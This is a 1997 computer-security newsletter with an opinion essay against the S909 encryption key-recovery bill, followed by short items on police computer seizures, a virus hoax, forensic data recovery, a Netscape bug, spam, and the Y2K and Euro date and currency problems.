Criticism of S909 comes from three groups. First, from privacy advocates and technologists who fear an unmanageable key recovery system that would invite abuse from within and outside the government, and significantly weaken the infrastructure on which we all will depend. The second group is the computer industry, which fears that a law requiring products to include US government access will make them unable to compete in a world where roughly 60% of their revenues come from outside the US, where their foreign competitors are not so bound. Third, US companies operating internationally are concerned that foreign governments with key recovery – we assume no foreign government will let the US government hold the keys – will use it to steal intellectual property or other valuable business secrets and pass it on to their own industry. (Using government intelligence to help state-owned industries win business from US companies is a well-established practice in France and elsewhere.) Let’s take a closer look at the first two arguments.

In the cyber society we are rapidly moving towards, everything about us will be stored digitally. Contrary to assertions by the FBI (which says it only wants to maintain wiretap capabilities as they have existed since 1968), the proposal for key recovery is not the digital equivalent of putting alligator clips on phone wires. It is more like giving the government the keys to our entire personal and professional lives. Keys that are difficult to control and track. And while the FBI says that access will only be by authorized court order, they have not addressed how controls and audit will prevent abuse in the form of non-intrusive, surreptitious use of these valuable keys. The far-reaching implications of such an unprecedented government capability must be analyzed and debated further for the protection of all. Would you allow local and federal law enforcement to have and store a copy of the key to your home and your filing cabinets? It is interesting to note that the encryption issue is a rare case where both the National Rifle Association and the Civil Liberties Union are on the same side, opposed to any law that restricts an individual’s use of encryption.

Industry has legitimate and serious concerns about the effect S909 will have on their ability to compete in a global marketplace. The FBI’s plan is to require key recovery in products built, sold, or used in the US. Clearly, their hope is that the US market, thus regulated, will sway the international market. But if other countries – as Germany already has – choose not to control the export of encryption or require key recovery, how will US industry compete? Even Director Freeh admits that given a choice of government key recovery and non-government key recovery products, corporations and individuals will choose the latter. Having failed in its attempts to gain international consensus on key recovery, the administration, as must the Congress, accept this threat to our dominance of the high-tech industry as reality. The threat is simply that US competitiveness will become a casualty of the crypto-wars, as we struggle to comply with a law no one fully understands, and foreign suppliers step in to meet the demand. With hundreds of thousands of important, well-paying jobs in an industry we currently lead at stake, economic well-being must be considered more carefully as part of the national security formula.

The chorus of voices supporting an end to government control of encryption has grown in recent years. It includes millions of individuals, most of industry; numerous industry groups including the Software Publisher’s Association and the Business Software Alliance; a majority of the US House of Representatives (1); a Federal Judge (2), and the California Legislature (3). These are organizations and people who have studied this problem closely. Their position is supported by numerous studies, including one done by the National Research Council, which urges relaxation of export controls and a “go slow” policy on key recovery, which it called unproved.

(1) More than half of the members of the House are co-sponsors of the SAFE bill – Security and Freedom Through Encryption – HR695, authored by Rep. Bob Goodlatte, D-Va., which would prohibit domestic US government controls on encryption. However, during the week of September 8, the House Intelligence Committee modified the SAFE Bill to look more like McCain-Kerry. [CK: The bill passed out of committee back in its original form.]

(2) On August 26, 1997, the Hon. Marilyn Hall Patel ruled against export control of encryption, saying in part “the encryption regulations are an unconstitutional prior restraint in violation of the First Amendment.”

(3) California Senate Joint Resolution 29 gained final passage September 5, 1997, when the state Assembly passed, by a vote of 79-0, a resolution calling for the enactment of the SAFE bill.

There is a fourth group that should be interested, but seems not to be. That is the Congress itself. Will Congress (and the Judicial Branch as well) be exempt, and be able to purchase non-key-recovery products? Or will the Attorney General and FBI Director have access to all their most sensitive communications?

With so much at stake, we can only hope that the Senate will be willing to look more closely at and hear more voices on this critical issue before turning S909 into law. If you have an opinion on this issue, your representatives in Congress should hear from you. It’s the only vote you’ll get.

Without trying to sound paranoid, if you consider this debate academic, please think again. The initial reaction is “I’ve got nothing to hide; I don’t do anything wrong.” That may be true, but take a second look at who you are entrusting that data to. Look closely at who had access to what at the White House in recent years and how that information was (mis)used. Then, ask yourself if you or your business can afford to be compromised by these same folks. Insight Magazine reports that the current court that judges the validity of secret taps of the kind required to get at a backdoor in a security program has yet to turn down a request (and, oh yes, this court meets in secret!).

General Information

Let’s all hope that none of the gentle readers of this newsletter will run afoul of the law, but if you happen to and your computer is involved, here are some of the things you might expect to happen in the name of gathering evidence.

  • Law enforcement will assume the worst; in the case of computers this means that they assume you have installed a simple way to erase all data from storage. Therefore, if you are at your computer the first thing they will do is find a way to remove you from the area of the computer.
  • Next they will shut the system down. For standalone computers this will likely mean unplugging the computer. For networked devices they will probably command an ordered shutdown (largely because network servers tend to keep lots of information in memory cache and an ordered shutdown will write this out to disk). The concern is to preserve evidence and prevent any automatic processes from erasing information. Individual situations may vary.
  • Next, they will likely gather as much of the hardware and software as they can find and cart it off to another location to work on it. It’s important that you realize this because even if you are innocent and there is no data of interest to them on your computer, you will still not have access to any part of it until the evidence gathering process is complete; and even then if the investigator is not particularly competent or careful the gathering process may damage data. (The very careful [or very paranoid] among you might conclude from this that having an off-site backup stored where nobody else knows where it is might be a good thing.)
  • During evidence gathering you can expect authorities to first make a bit-stream backup of everything. The image backup is necessary in case you have installed traps in the computer software, they activate, and the computer must be returned to its original state for another try at getting to your data. This process might be made harder if you happen to encrypt your data (and do NOT store a written copy of the password anywhere near the computer!). The encryption threat is one reason why the government has suddenly turned the spotlight on it (see related article in the General Security section of this newsletter).

To protect yourself in these circumstances, you need to keep a complete inventory of your computer hardware/software stored in an off-site location (this is a good general thing to do, it helps you if your equipment is stolen). Compare this list with the receipt you get for equipment taken and again with equipment returned after any investigation. If possible, supervise the process of gathering your hardware/software and take your own notes saying what happened and what is being taken (it’s unlikely you’ll be allowed to do this, but try anyhow). Finally, make certain that the investigators take precautions that protect your data (assuming you have nothing to hide). For example, most patrol cars have a powerful radio in the trunk. Point out to the investigators how the emissions from such a device can damage data stored in a computer and that they should avoid sitting the computer on top of the radio.

Nobody likes to become involved with the law in a criminal investigation, but now and again it could happen, even by accident, and if your computer is involved you may not see it again for awhile (and when you do see it there is no guarantee any of your data will still be available and in good form). It’s important that you try to find a way of minimizing the damage to your business should the worst happen.

Computer Knowledge Newsletter – October 1997 Issue

In This Issue:

Virus News

AOL Cookie Rumor. If you have not heard it yet, you probably will soon: a rumor is moving through the net that purports to come from an AOL software developer saying he’s discovered a new “cookie” in the next version of the AOL software. This cookie is supposed to search through your hard disk and report the findings back to the company for some nefarious purpose.

It’s a hoax. As with all such hoaxes the main theme is built around technobabble and adds detail well beyond what would be necessary for a real warning (this one even goes into personal detail about the person supposedly doing the analysis).

General Security

Data Recovery. Your data has been called for in court and you really don’t want it seen in court so you erase the disk. Are you safe? Don’t bet on it.

Ignoring the fact that you’ve just committed an illegal act (destroying evidence) the fact that data are written to a disk as binary bits on magnetic media means it is often possible to recover the data by analysis of the media.

At its simplest, when you erase a file only the directory pointer to the file is erased along with the first element in the file allocation table being marked available so future disk writes can use the space. The data remains on the disk. So, if you just erased the file using the DEL command then you really have not deleted the file; just pointers to it. At this stage the data can frequently be recovered using fairly simple tools you can purchase at any software store.

If, after deleting the file, you attempt to overwrite the data it still may be able to be recovered using sophisticated analysis techniques. Ontrack Data International, Inc. has performed disk analysis in a number of court cases and recovered enough data to obtain convictions. A company was accused of using sexually explicit games on office PCs and deleted the programs after being accused. Ontrack found traces of the files and the company lost. In an embezzlement case Ontrack found files an employee deleted after being told not to. They have also stopped a software piracy ring which used a company’s server for distribution.

Data recovery is becoming big business. [Note: This article was written Saturday, 11 Oct and C|Net, in the show I watched on the following day, did extensive coverage on this subject; mentioning Ontrack and showing their labs.]

Netscape. If you have downloaded an early version of Netscape’s new Communicator browser or suite you might want to update to the latest version. Early versions have some bugs in the JavaScript implementation. One of these creates an opportunity for a malicious web designer to install a “tracker” applet in the form of an invisible window that steals information from your main window and sends it back to the malicious site. The latest upgrade is supposed to fix this problem.

Encryption. The SAFE bill described in the last newsletter safely made it out of the House Commerce Committee without the Oxley/Manton amendment which would have effectively gutted the safety of encryption. But, you can be certain that will not be the last time the encryption backdoor issue surfaces. Keep a close watch.

General Information

Spam. We all get spam (unwanted advertising E-mail in this case). What should you do about it? Generally, you should just try to build E-mail filters and hit the delete key for those messages that make it through the filters.

But, you say, most of the spam messages have some sort of remove mechanism. Why not just use it? Basically, because the remove instructions generally don’t work. They are either fake addresses or addresses that actually collect information. Stop to think for a moment: what’s the best way to validate a list of addresses? Of course, you get responses from those addresses. So, when you respond to spam, even a negative response, you’ve validated the fact that your address is, in fact, active. That’s a goldmine for marketers.

In a related way, it would appear that marketers now have yet another way to validate E-mail addresses. They send what appear to be personal notes hoping you will respond in some way. The notes are usually just innocuous and from reasonable-sounding addresses (but, of course, not addresses you recognize). It’s really easy to get caught up in messages like that and jot down a quick response and send it off. Be a bit more careful. If you don’t recognize the address and/or the message is not signed by someone you know just ignore it. If it is someone you know they’ll get back to you with a more detailed message you will recognize. When you then respond, refer them to this newsletter as an excuse if you need to.

Early Year 2000 Problem. Do you run Mentor Graphics on a Hewlett-Packard Apollo Domain workstation? If so beware. At exactly 14:59 Greenwich Mean Time on November 2nd the real-time clock will increment so that the 32nd bit is set. Some computer operations treat this bit as a negative number indicator which will place the file system at risk for date operations that treat the number in this way. Mentor says only a small number of people are at risk (the system is old); but if you are one of those check with Mentor for fixes to the problem. (HP is supposed to have a patch available but Mentor is reported to say that patch does not apply to early versions of the software. Check if you are not absolutely certain.)

The Euro.With year 2000 (Y2K) problems making most of the news you may not have noticed that another worldwide computer problem is on the horizon a year sooner. Current plans call for the European Community to introduce a single currency unit, the Euro, on 1 January 1999. Physical currency will remain as it is for three more years (when Euro money will then replace the 13 billion notes and 76 billion coins in circulation). But, everything financial other than the notes will change at the start of 1999.

Not generally understood by the public, the Euro problem could be in some ways worse than the Y2K problem. With Y2K one has to fix code that already exists to add support for four-digit years. The basic logic remains the same. The Euro problem requires additional modules to perform currency conversions. Adding modules to legacy code can be a serious problem and for those systems affected the cost of the change could actually be more than fixing Y2K problem. There are far more concerns than just adding another currency conversion to your software (e.g., statistical analysis in a currency with no historical database behind it).

And, you have a year less time to work on this one!